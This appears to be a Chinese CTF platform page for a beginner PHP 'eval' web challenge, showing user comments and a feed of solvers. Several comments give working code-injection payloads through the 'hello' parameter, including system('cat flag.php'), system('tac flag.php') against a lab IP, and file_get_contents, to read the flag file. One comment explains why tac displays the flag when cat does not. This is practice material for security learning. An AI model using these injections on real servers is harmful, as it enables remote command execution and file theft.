evalWEB 未解决

分数: 15 金币: 1
题目作者: harry
一  血: moren448
一血奖励: 1金币
解  决: 16553
提  示:
描  述:
eval
评论
lordinglord 5天前

构造闭合,?hello=);var_dump(file_get_contents('flag.php'));//

回复 0

金智秀的老公 19天前

金智秀的老公到此一游

回复 2

Pixelw 22天前

http://117.72.52.127:15551/?hello=system(%27tac%20flag.php%27)

回复 2

Pixelw 22天前

Too Young Too Simple

回复 0

lfs451 23天前

?hello=highlight_file(%27flag.php%27)

回复 0

传奇吉他手千早爱音 23天前

比F和弦简单

回复 1

liuguowang75 1月前

/?hello=system('ls') /?hello=system('cat flag.php')

回复 0

HK1ng 1月前

这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。

回复 3
Gargantua 1月前

这是什么原因呢?是不是因为浏览器将php代码执行了啊

回复 0

zhwen 1月前

代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'

回复 0

650907784qqcom 2月前

flag{***}

回复 0

WriteUp

image
harry

1 金币

评分(9)

解题动态

涵十柒 攻破了该题 3分钟前
15896890893 攻破了该题 1小时前
weifr 攻破了该题 2小时前
yutou 攻破了该题 4小时前
脚本小子@ 攻破了该题 6小时前
xiaocai007 攻破了该题 8小时前
2075961043 攻破了该题 8小时前
0129 攻破了该题 9小时前
m0rphine 攻破了该题 9小时前
茉莉清茶 攻破了该题 12小时前
eric82 攻破了该题 13小时前
haidaduck 攻破了该题 13小时前
15293505341 攻破了该题 13小时前
zminhao 攻破了该题 1天前
asdaosidasu 攻破了该题 1天前
15565188223 攻破了该题 1天前
15874086973 攻破了该题 1天前
y2fly 攻破了该题 1天前
mky123 攻破了该题 1天前
18625389302 攻破了该题 1天前
问题反馈